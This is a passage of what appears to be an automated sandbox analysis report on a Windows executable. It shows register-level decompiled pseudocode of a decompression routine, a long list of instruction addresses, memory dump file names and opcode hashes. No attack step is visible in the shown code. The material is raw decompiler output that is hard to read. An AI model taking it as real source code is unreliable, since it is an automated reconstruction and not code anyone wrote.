                                                                                    											if(__eax != 0) {
                                                                                    												L48:
                                                                                    												__eflags = __eax -  *(__ebp - 0x34);
                                                                                    												if(__eax >=  *(__ebp - 0x34)) {
                                                                                    													__eax =  *(__ebp - 0x34);
                                                                                    												}
                                                                                    												__ecx = __esi[1];
                                                                                    												__eflags = __ecx - __eax;
                                                                                    												__edi = __ecx;
                                                                                    												if(__ecx >= __eax) {
                                                                                    													__edi = __eax;
                                                                                    												}
                                                                                    												__eax = E0040585F( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                    												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                    												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                    												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                    												_t80 =  &(__esi[1]);
                                                                                    												 *_t80 = __esi[1] - __edi;
                                                                                    												__eflags =  *_t80;
                                                                                    												if( *_t80 == 0) {
                                                                                    													L53:
                                                                                    													__eax = __esi[0x145];
                                                                                    													L54:
                                                                                    													 *__esi = __eax;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    											L32:
                                                                                    											__ecx = __esi[0x26e8];
                                                                                    											__edx =  *(__ebp - 0x30);
                                                                                    											__eflags = __edx - __ecx;
                                                                                    											if(__edx != __ecx) {
                                                                                    												L38:
                                                                                    												__esi[0x26ea] = __edx;
                                                                                    												__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    												__edx = __esi[0x26ea];
                                                                                    												__ecx = __esi[0x26e9];
                                                                                    												__eflags = __edx - __ecx;
                                                                                    												 *(__ebp - 0x30) = __edx;
                                                                                    												if(__edx >= __ecx) {
                                                                                    													__eax = __esi[0x26e8];
                                                                                    													__eax = __esi[0x26e8] - __edx;
                                                                                    													__eflags = __eax;
                                                                                    												} else {
                                                                                    													__ecx = __ecx - __edx;
                                                                                    													__eax = __ecx - __edx - 1;
                                                                                    												}
                                                                                    												__edi = __esi[0x26e8];
                                                                                    												 *(__ebp - 0x2c) = __eax;
                                                                                    												__eflags = __edx - __edi;
                                                                                    												if(__edx == __edi) {
                                                                                    													__edx =  &(__esi[0x6e8]);
                                                                                    													__eflags = __edx - __ecx;
                                                                                    													if(__eflags != 0) {
                                                                                    														 *(__ebp - 0x30) = __edx;
                                                                                    														if(__eflags >= 0) {
                                                                                    															__edi = __edi - __edx;
                                                                                    															__eflags = __edi;
                                                                                    															__eax = __edi;
                                                                                    														} else {
                                                                                    															__ecx = __ecx - __edx;
                                                                                    															__eax = __ecx;
                                                                                    														}
                                                                                    														 *(__ebp - 0x2c) = __eax;
                                                                                    													}
                                                                                    												}
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													goto L183;
                                                                                    												} else {
                                                                                    													goto L48;
                                                                                    												}
                                                                                    											}
                                                                                    											L33:
                                                                                    											__eax = __esi[0x26e9];
                                                                                    											__edi =  &(__esi[0x6e8]);
                                                                                    											__eflags = __eax - __edi;
                                                                                    											if(__eax == __edi) {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    											L34:
                                                                                    											__edx = __edi;
                                                                                    											__eflags = __edx - __eax;
                                                                                    											 *(__ebp - 0x30) = __edx;
                                                                                    											if(__edx >= __eax) {
                                                                                    												__ecx = __ecx - __edx;
                                                                                    												__eflags = __ecx;
                                                                                    												__eax = __ecx;
                                                                                    											} else {
                                                                                    												__eax = __eax - __edx;
                                                                                    												__eax = __eax - 1;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L48;
                                                                                    											} else {
                                                                                    												goto L38;
                                                                                    											}
                                                                                    										case 0xb:
                                                                                    											goto L56;
                                                                                    										case 0xc:
                                                                                    											L60:
                                                                                    											__esi[1] = __esi[1] >> 0xa;
                                                                                    											__eax = (__esi[1] >> 0xa) + 4;
                                                                                    											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                    												goto L68;
                                                                                    											}
                                                                                    											goto L61;
                                                                                    										case 0xd:
                                                                                    											while(1) {
                                                                                    												L93:
                                                                                    												__eax = __esi[1];
                                                                                    												__ecx = __esi[2];
                                                                                    												__edx = __eax;
                                                                                    												__eax = __eax & 0x0000001f;
                                                                                    												__edx = __edx >> 5;
                                                                                    												__eax = __edx + __eax + 0x102;
                                                                                    												__eflags = __esi[2] - __eax;
                                                                                    												if(__esi[2] >= __eax) {
                                                                                    													break;
                                                                                    												}
                                                                                    												L73:
                                                                                    												__eax = __esi[0x143];
                                                                                    												while(1) {
                                                                                    													L76:
                                                                                    													__eflags = __ebx - __eax;
                                                                                    													if(__ebx >= __eax) {
                                                                                    														break;
                                                                                    													}
                                                                                    													L74:
                                                                                    													__eflags =  *(__ebp - 0x34);
                                                                                    													if( *(__ebp - 0x34) == 0) {
                                                                                    														goto L182;
                                                                                    													}
                                                                                    													L75:
                                                                                    													__ecx =  *(__ebp - 0x38);
                                                                                    													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    													__ecx = __ebx;
                                                                                    													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    													__ebx = __ebx + 8;
                                                                                    													__eflags = __ebx;
                                                                                    												}
                                                                                    												L77:
                                                                                    												__eax =  *(0x409408 + __eax * 2) & 0x0000ffff;
                                                                                    												__eax = __eax &  *(__ebp - 0x40);
                                                                                    												__ecx = __esi[0x144];
                                                                                    												__eax = __esi[0x144] + __eax * 4;
                                                                                    												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                    												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                    												__eflags = __eax - 0x10;
                                                                                    												 *(__ebp - 0x14) = __eax;
                                                                                    												if(__eax >= 0x10) {
                                                                                    													L79:
                                                                                    													__eflags = __eax - 0x12;
                                                                                    													if(__eax != 0x12) {
                                                                                    														__eax = __eax + 0xfffffff2;
                                                                                    														 *(__ebp - 8) = 3;
                                                                                    													} else {
                                                                                    														_push(7);
                                                                                    														 *(__ebp - 8) = 0xb;
                                                                                    														_pop(__eax);
                                                                                    													}
                                                                                    													while(1) {
                                                                                    														L84:
                                                                                    														__ecx = __eax + __edx;
                                                                                    														__eflags = __ebx - __eax + __edx;
                                                                                    														if(__ebx >= __eax + __edx) {
                                                                                    															break;
                                                                                    														}
                                                                                    														L82:
                                                                                    														__eflags =  *(__ebp - 0x34);
                                                                                    														if( *(__ebp - 0x34) == 0) {
                                                                                    															goto L182;
                                                                                    														}
                                                                                    														L83:
                                                                                    														__ecx =  *(__ebp - 0x38);
                                                                                    														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                    														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                    														__ecx = __ebx;
                                                                                    														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                    														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                    														__ebx = __ebx + 8;
                                                                                    														__eflags = __ebx;
                                                                                    													}
                                                                                    													L85:
                                                                                    													__ecx = __edx;
                                                                                    													__ebx = __ebx - __edx;
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													 *(0x409408 + __eax * 2) & 0x0000ffff =  *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                    													__edx =  *(__ebp - 8);
                                                                                    													__ebx = __ebx - __eax;
                                                                                    													__edx =  *(__ebp - 8) + ( *(0x409408 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                    													__ecx = __eax;
                                                                                    													__eax = __esi[1];
                                                                                    													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    													__ecx = __esi[2];
                                                                                    													__eax = __eax >> 5;
                                                                                    													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                    													__eax = __eax & 0x0000001f;
                                                                                    													__eax = __edi + __eax + 0x102;
                                                                                    													__edi = __edx + __ecx;
                                                                                    													__eflags = __edx + __ecx - __eax;
                                                                                    													if(__edx + __ecx > __eax) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L86:
                                                                                    													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                    													if( *(__ebp - 0x14) != 0x10) {
                                                                                    														L89:
                                                                                    														__edi = 0;
                                                                                    														__eflags = 0;
                                                                                    														L90:
                                                                                    														__eax = __esi + 0xc + __ecx * 4;
                                                                                    														do {
                                                                                    															L91:
                                                                                    															 *__eax = __edi;
                                                                                    															__ecx = __ecx + 1;
                                                                                    															__eax = __eax + 4;
                                                                                    															__edx = __edx - 1;
                                                                                    															__eflags = __edx;
                                                                                    														} while (__edx != 0);
                                                                                    														__esi[2] = __ecx;
                                                                                    														continue;
                                                                                    													}
                                                                                    													L87:
                                                                                    													__eflags = __ecx - 1;
                                                                                    													if(__ecx < 1) {
                                                                                    														goto L9;
                                                                                    													}
                                                                                    													L88:
                                                                                    													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                    													goto L90;
                                                                                    												}
                                                                                    												L78:
                                                                                    												__ecx = __edx;
                                                                                    												__ebx = __ebx - __edx;
                                                                                    												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                    												__ecx = __esi[2];
                                                                                    												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                    												__esi[2] = __esi[2] + 1;
                                                                                    											}
                                                                                    											L94:
                                                                                    											__eax = __esi[1];
                                                                                    											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                    											__edi = __eax;
                                                                                    											__eax = __eax >> 5;
                                                                                    											__edi = __edi & 0x0000001f;
                                                                                    											__ecx = 0x101;
                                                                                    											__eax = __eax & 0x0000001f;
                                                                                    											__edi = __edi + 0x101;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = __ebp - 0xc;
                                                                                    											 *(__ebp - 0x14) = __eax;
                                                                                    											 &(__esi[0x148]) = __ebp - 4;
                                                                                    											 *(__ebp - 4) = 9;
                                                                                    											__ebp - 0x18 =  &(__esi[3]);
                                                                                    											 *(__ebp - 0x10) = 6;
                                                                                    											__eax = E00406B2B( &(__esi[3]), __edi, 0x101, 0x4073fc, 0x40743c, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    											__eflags =  *(__ebp - 4);
                                                                                    											if( *(__ebp - 4) == 0) {
                                                                                    												__eax = __eax | 0xffffffff;
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__eflags = __eax;
                                                                                    											if(__eax != 0) {
                                                                                    												goto L9;
                                                                                    											} else {
                                                                                    												L97:
                                                                                    												__ebp - 0xc =  &(__esi[0x148]);
                                                                                    												__ebp - 0x10 = __ebp - 0x1c;
                                                                                    												__eax = __esi + 0xc + __edi * 4;
                                                                                    												__eax = E00406B2B(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x40747c, 0x4074b8, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax != 0) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												L98:
                                                                                    												__eax =  *(__ebp - 0x10);
                                                                                    												__eflags =  *(__ebp - 0x10);
                                                                                    												if( *(__ebp - 0x10) != 0) {
                                                                                    													L100:
                                                                                    													__cl =  *(__ebp - 4);
                                                                                    													 *__esi =  *__esi & 0x00000000;
                                                                                    													__eflags =  *__esi;
                                                                                    													__esi[4] = __al;
                                                                                    													__eax =  *(__ebp - 0x18);
                                                                                    													__esi[5] =  *(__ebp - 0x18);
                                                                                    													__eax =  *(__ebp - 0x1c);
                                                                                    													__esi[4] = __cl;
                                                                                    													__esi[6] =  *(__ebp - 0x1c);
                                                                                    													goto L101;
                                                                                    												}
                                                                                    												L99:
                                                                                    												__eflags = __edi - 0x101;
                                                                                    												if(__edi > 0x101) {
                                                                                    													goto L9;
                                                                                    												}
                                                                                    												goto L100;
                                                                                    											}
                                                                                    										case 0xe:
                                                                                    											goto L9;
                                                                                    										case 0xf:
                                                                                    											L175:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                    											__eax = E00406AC3( *((intOrPtr*)(__ebp + 8)));
                                                                                    											__ecx = __esi[0x26ea];
                                                                                    											__edx = __esi[0x26e9];
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x30) = __ecx;
                                                                                    											if(__ecx >= __edx) {
                                                                                    												__eax = __esi[0x26e8];
                                                                                    												__eax = __esi[0x26e8] - __ecx;
                                                                                    												__eflags = __eax;
                                                                                    											} else {
                                                                                    												__edx = __edx - __ecx;
                                                                                    												__eax = __edx - __ecx - 1;
                                                                                    											}
                                                                                    											__eflags = __ecx - __edx;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ecx != __edx) {
                                                                                    												L183:
                                                                                    												__edi = 0;
                                                                                    												goto L10;
                                                                                    											} else {
                                                                                    												L179:
                                                                                    												__eax = __esi[0x145];
                                                                                    												__eflags = __eax - 8;
                                                                                    												 *__esi = __eax;
                                                                                    												if(__eax != 8) {
                                                                                    													L184:
                                                                                    													0 = 1;
                                                                                    													goto L10;
                                                                                    												}
                                                                                    												goto L180;
                                                                                    											}
                                                                                    									}
                                                                                    								}
                                                                                    								L181:
                                                                                    								goto L9;
                                                                                    							}
                                                                                    							L70:
                                                                                    							if( *__edi == __eax) {
                                                                                    								goto L72;
                                                                                    							}
                                                                                    							L71:
                                                                                    							__esi[2] = __esi[2] & __eax;
                                                                                    							 *__esi = 0xd;
                                                                                    							goto L93;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    				L182:
                                                                                    				_t443 = 0;
                                                                                    				_t446[0x147] =  *(_t448 - 0x40);
                                                                                    				_t446[0x146] = _t425;
                                                                                    				( *(_t448 + 8))[1] = 0;
                                                                                    				goto L11;
                                                                                    			}
                                                                                    0x00406427
                                                                                    0x00406427
                                                                                    0x00406427
                                                                                    0x00406430
                                                                                    0x00406430
                                                                                    0x00406433
                                                                                    0x00406441
                                                                                    0x00406447
                                                                                    0x0040644c
                                                                                    0x00406452
                                                                                    0x00406458
                                                                                    0x0040645e
                                                                                    0x00406465
                                                                                    0x00406479
                                                                                    0x00406479
                                                                                    0x00406a48
                                                                                    0x00406a48
                                                                                    0x00406a48
                                                                                    0x00406a4d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406085
                                                                                    0x00406085
                                                                                    0x00000000
                                                                                    0x00406680
                                                                                    0x00406680
                                                                                    0x00406684
                                                                                    0x00406687
                                                                                    0x0040668a
                                                                                    0x0040668d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406693
                                                                                    0x00406693
                                                                                    0x004066b8
                                                                                    0x004066b8
                                                                                    0x004066b8
                                                                                    0x004066ba
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406698
                                                                                    0x00406698
                                                                                    0x0040669c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004066a2
                                                                                    0x004066a2
                                                                                    0x004066a5
                                                                                    0x004066a8
                                                                                    0x004066ab
                                                                                    0x004066ad
                                                                                    0x004066af
                                                                                    0x004066b2
                                                                                    0x004066b5
                                                                                    0x004066b5
                                                                                    0x004066b5
                                                                                    0x004066bc
                                                                                    0x004066bc
                                                                                    0x004066c4
                                                                                    0x004066c7
                                                                                    0x004066ca
                                                                                    0x004066cd
                                                                                    0x004066d1
                                                                                    0x004066d4
                                                                                    0x004066d6
                                                                                    0x004066d9
                                                                                    0x004066db
                                                                                    0x004066ef
                                                                                    0x004066ef
                                                                                    0x004066f2
                                                                                    0x0040670c
                                                                                    0x0040670c
                                                                                    0x0040670f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406715
                                                                                    0x00406715
                                                                                    0x00406718
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x0040671e
                                                                                    0x00000000
                                                                                    0x0040671e
                                                                                    0x004066f4
                                                                                    0x004066f7
                                                                                    0x004066fe
                                                                                    0x00406701
                                                                                    0x00000000
                                                                                    0x00406701
                                                                                    0x004066dd
                                                                                    0x004066e1
                                                                                    0x004066e4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406729
                                                                                    0x00406729
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x0040674e
                                                                                    0x00406750
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040672e
                                                                                    0x0040672e
                                                                                    0x00406732
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406738
                                                                                    0x00406738
                                                                                    0x0040673b
                                                                                    0x0040673e
                                                                                    0x00406741
                                                                                    0x00406743
                                                                                    0x00406745
                                                                                    0x00406748
                                                                                    0x0040674b
                                                                                    0x0040674b
                                                                                    0x0040674b
                                                                                    0x00406752
                                                                                    0x0040675a
                                                                                    0x0040675d
                                                                                    0x00406760
                                                                                    0x00406762
                                                                                    0x00406765
                                                                                    0x00406765
                                                                                    0x00406767
                                                                                    0x0040676b
                                                                                    0x0040676e
                                                                                    0x00406771
                                                                                    0x00406774
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040677a
                                                                                    0x0040677a
                                                                                    0x0040679f
                                                                                    0x0040679f
                                                                                    0x0040679f
                                                                                    0x004067a1
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040677f
                                                                                    0x0040677f
                                                                                    0x00406783
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406789
                                                                                    0x00406789
                                                                                    0x0040678c
                                                                                    0x0040678f
                                                                                    0x00406792
                                                                                    0x00406794
                                                                                    0x00406796
                                                                                    0x00406799
                                                                                    0x0040679c
                                                                                    0x0040679c
                                                                                    0x0040679c
                                                                                    0x004067a3
                                                                                    0x004067a3
                                                                                    0x004067ab
                                                                                    0x004067ae
                                                                                    0x004067b1
                                                                                    0x004067b4
                                                                                    0x004067b8
                                                                                    0x004067bb
                                                                                    0x004067bd
                                                                                    0x004067c0
                                                                                    0x004067c3
                                                                                    0x004067dd
                                                                                    0x004067dd
                                                                                    0x004067e0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067e6
                                                                                    0x004067e6
                                                                                    0x004067e9
                                                                                    0x004067f0
                                                                                    0x00000000
                                                                                    0x004067f0
                                                                                    0x004067c5
                                                                                    0x004067c8
                                                                                    0x004067cf
                                                                                    0x004067d2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067f8
                                                                                    0x004067f8
                                                                                    0x0040681d
                                                                                    0x0040681d
                                                                                    0x0040681d
                                                                                    0x0040681f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004067fd
                                                                                    0x004067fd
                                                                                    0x00406801
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406807
                                                                                    0x00406807
                                                                                    0x0040680a
                                                                                    0x0040680d
                                                                                    0x00406810
                                                                                    0x00406812
                                                                                    0x00406814
                                                                                    0x00406817
                                                                                    0x0040681a
                                                                                    0x0040681a
                                                                                    0x0040681a
                                                                                    0x00406821
                                                                                    0x00406829
                                                                                    0x0040682c
                                                                                    0x0040682f
                                                                                    0x00406831
                                                                                    0x00406834
                                                                                    0x00406834
                                                                                    0x00406836
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040683c
                                                                                    0x0040683c
                                                                                    0x0040683f
                                                                                    0x00406844
                                                                                    0x00406846
                                                                                    0x0040684c
                                                                                    0x0040684e
                                                                                    0x00406863
                                                                                    0x00406865
                                                                                    0x00406865
                                                                                    0x00406850
                                                                                    0x00406856
                                                                                    0x00406858
                                                                                    0x0040685a
                                                                                    0x0040685a
                                                                                    0x00406867
                                                                                    0x0040686b
                                                                                    0x0040686e
                                                                                    0x00406874
                                                                                    0x00406874
                                                                                    0x00406877
                                                                                    0x00406877
                                                                                    0x00406877
                                                                                    0x00406879
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040687f
                                                                                    0x0040687f
                                                                                    0x00406885
                                                                                    0x00406887
                                                                                    0x004068ac
                                                                                    0x004068af
                                                                                    0x004068b5
                                                                                    0x004068ba
                                                                                    0x004068c0
                                                                                    0x004068c6
                                                                                    0x004068c8
                                                                                    0x004068cb
                                                                                    0x004068d4
                                                                                    0x004068da
                                                                                    0x004068da
                                                                                    0x004068cd
                                                                                    0x004068cf
                                                                                    0x004068d1
                                                                                    0x004068d1
                                                                                    0x004068dc
                                                                                    0x004068e2
                                                                                    0x004068e4
                                                                                    0x004068e7
                                                                                    0x004068e9
                                                                                    0x004068ef
                                                                                    0x004068f1
                                                                                    0x004068f3
                                                                                    0x004068f5
                                                                                    0x004068f7
                                                                                    0x004068fa
                                                                                    0x00406903
                                                                                    0x00406906
                                                                                    0x00406906
                                                                                    0x004068fc
                                                                                    0x004068fc
                                                                                    0x004068ff
                                                                                    0x004068ff
                                                                                    0x004068fa
                                                                                    0x004068f1
                                                                                    0x00406908
                                                                                    0x0040690a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040690a
                                                                                    0x00406889
                                                                                    0x00406889
                                                                                    0x004063b3
                                                                                    0x004063b6
                                                                                    0x004063b9
                                                                                    0x004063bf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406596
                                                                                    0x00406596
                                                                                    0x00406596
                                                                                    0x00406599
                                                                                    0x0040659c
                                                                                    0x0040659e
                                                                                    0x004065a1
                                                                                    0x004065a7
                                                                                    0x004065ae
                                                                                    0x004065b0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406484
                                                                                    0x00406484
                                                                                    0x004064ac
                                                                                    0x004064ac
                                                                                    0x004064ac
                                                                                    0x004064ae
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040648c
                                                                                    0x0040648c
                                                                                    0x00406490
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406496
                                                                                    0x00406496
                                                                                    0x00406499
                                                                                    0x0040649c
                                                                                    0x0040649f
                                                                                    0x004064a1
                                                                                    0x004064a3
                                                                                    0x004064a6
                                                                                    0x004064a9
                                                                                    0x004064a9
                                                                                    0x004064a9
                                                                                    0x004064b0
                                                                                    0x004064b0
                                                                                    0x004064b8
                                                                                    0x004064bb
                                                                                    0x004064c1
                                                                                    0x004064c4
                                                                                    0x004064c8
                                                                                    0x004064cc
                                                                                    0x004064cf
                                                                                    0x004064d2
                                                                                    0x004064ea
                                                                                    0x004064ea
                                                                                    0x004064ed
                                                                                    0x004064fb
                                                                                    0x004064fe
                                                                                    0x004064ef
                                                                                    0x004064ef
                                                                                    0x004064f1
                                                                                    0x004064f8
                                                                                    0x004064f8
                                                                                    0x00406527
                                                                                    0x00406527
                                                                                    0x00406527
                                                                                    0x0040652a
                                                                                    0x0040652c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406507
                                                                                    0x00406507
                                                                                    0x0040650b
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406511
                                                                                    0x00406511
                                                                                    0x00406514
                                                                                    0x00406517
                                                                                    0x0040651a
                                                                                    0x0040651c
                                                                                    0x0040651e
                                                                                    0x00406521
                                                                                    0x00406524
                                                                                    0x00406524
                                                                                    0x00406524
                                                                                    0x0040652e
                                                                                    0x0040652e
                                                                                    0x00406530
                                                                                    0x00406532
                                                                                    0x0040653d
                                                                                    0x00406540
                                                                                    0x00406543
                                                                                    0x00406545
                                                                                    0x00406547
                                                                                    0x00406549
                                                                                    0x0040654c
                                                                                    0x0040654f
                                                                                    0x00406554
                                                                                    0x00406557
                                                                                    0x0040655a
                                                                                    0x0040655d
                                                                                    0x00406564
                                                                                    0x00406567
                                                                                    0x00406569
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040656f
                                                                                    0x0040656f
                                                                                    0x00406573
                                                                                    0x00406584
                                                                                    0x00406584
                                                                                    0x00406584
                                                                                    0x00406586
                                                                                    0x00406586
                                                                                    0x0040658a
                                                                                    0x0040658a
                                                                                    0x0040658a
                                                                                    0x0040658c
                                                                                    0x0040658d
                                                                                    0x00406590
                                                                                    0x00406590
                                                                                    0x00406590
                                                                                    0x00406593
                                                                                    0x00000000
                                                                                    0x00406593
                                                                                    0x00406575
                                                                                    0x00406575
                                                                                    0x00406578
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040657e
                                                                                    0x0040657e
                                                                                    0x00000000
                                                                                    0x0040657e
                                                                                    0x004064d4
                                                                                    0x004064d4
                                                                                    0x004064d6
                                                                                    0x004064d8
                                                                                    0x004064db
                                                                                    0x004064de
                                                                                    0x004064e2
                                                                                    0x004064e2
                                                                                    0x004065b6
                                                                                    0x004065b6
                                                                                    0x004065b9
                                                                                    0x004065c0
                                                                                    0x004065c4
                                                                                    0x004065c6
                                                                                    0x004065c9
                                                                                    0x004065cc
                                                                                    0x004065d1
                                                                                    0x004065d4
                                                                                    0x004065d6
                                                                                    0x004065d7
                                                                                    0x004065da
                                                                                    0x004065e5
                                                                                    0x004065e8
                                                                                    0x004065ff
                                                                                    0x00406604
                                                                                    0x0040660b
                                                                                    0x00406610
                                                                                    0x00406614
                                                                                    0x00406616
                                                                                    0x00406616
                                                                                    0x00406616
                                                                                    0x00406619
                                                                                    0x0040661b
                                                                                    0x00000000
                                                                                    0x00406621
                                                                                    0x00406621
                                                                                    0x00406625
                                                                                    0x00406630
                                                                                    0x00406643
                                                                                    0x00406648
                                                                                    0x0040664d
                                                                                    0x0040664f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406655
                                                                                    0x00406655
                                                                                    0x00406658
                                                                                    0x0040665a
                                                                                    0x00406668
                                                                                    0x00406668
                                                                                    0x0040666b
                                                                                    0x0040666b
                                                                                    0x0040666e
                                                                                    0x00406671
                                                                                    0x00406674
                                                                                    0x00406677
                                                                                    0x0040667a
                                                                                    0x0040667d
                                                                                    0x00000000
                                                                                    0x0040667d
                                                                                    0x0040665c
                                                                                    0x0040665c
                                                                                    0x00406662
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406662
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406a01
                                                                                    0x00406a01
                                                                                    0x00406a07
                                                                                    0x00406a0d
                                                                                    0x00406a12
                                                                                    0x00406a18
                                                                                    0x00406a1e
                                                                                    0x00406a20
                                                                                    0x00406a23
                                                                                    0x00406a2c
                                                                                    0x00406a32
                                                                                    0x00406a32
                                                                                    0x00406a25
                                                                                    0x00406a27
                                                                                    0x00406a29
                                                                                    0x00406a29
                                                                                    0x00406a34
                                                                                    0x00406a36
                                                                                    0x00406a39
                                                                                    0x00406a74
                                                                                    0x00406a74
                                                                                    0x00000000
                                                                                    0x00406a3b
                                                                                    0x00406a3b
                                                                                    0x00406a3b
                                                                                    0x00406a41
                                                                                    0x00406a44
                                                                                    0x00406a46
                                                                                    0x00406a7b
                                                                                    0x00406a7d
                                                                                    0x00000000
                                                                                    0x00406a7d
                                                                                    0x00000000
                                                                                    0x00406a46
                                                                                    0x00000000
                                                                                    0x00406085
                                                                                    0x00406a53
                                                                                    0x00000000
                                                                                    0x00406a53
                                                                                    0x00406467
                                                                                    0x00406469
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040646b
                                                                                    0x0040646b
                                                                                    0x0040646e
                                                                                    0x00000000
                                                                                    0x0040646e
                                                                                    0x004063b3
                                                                                    0x00406374
                                                                                    0x00406a58
                                                                                    0x00406a5b
                                                                                    0x00406a5d
                                                                                    0x00406a66
                                                                                    0x00406a6c
                                                                                    0x00000000

Memory Dump Source
• Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp
• Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp
• Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
• Instruction ID: 2fa80b96e0c3f2f9afba8e6e6bfd5b6e13d9d39ff7e82b1c07230a33620f403b
• Opcode Fuzzy Hash: 54d80564fe19f3f3404c6606d58c011d861cfab5a50afacd25c13b8f5d904866
• Instruction Fuzzy Hash: 5BE1797190070ADFDB24CF58C980BAEBBF5EB45305F15892EE897A7291D338A991CF14
Uniqueness
Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
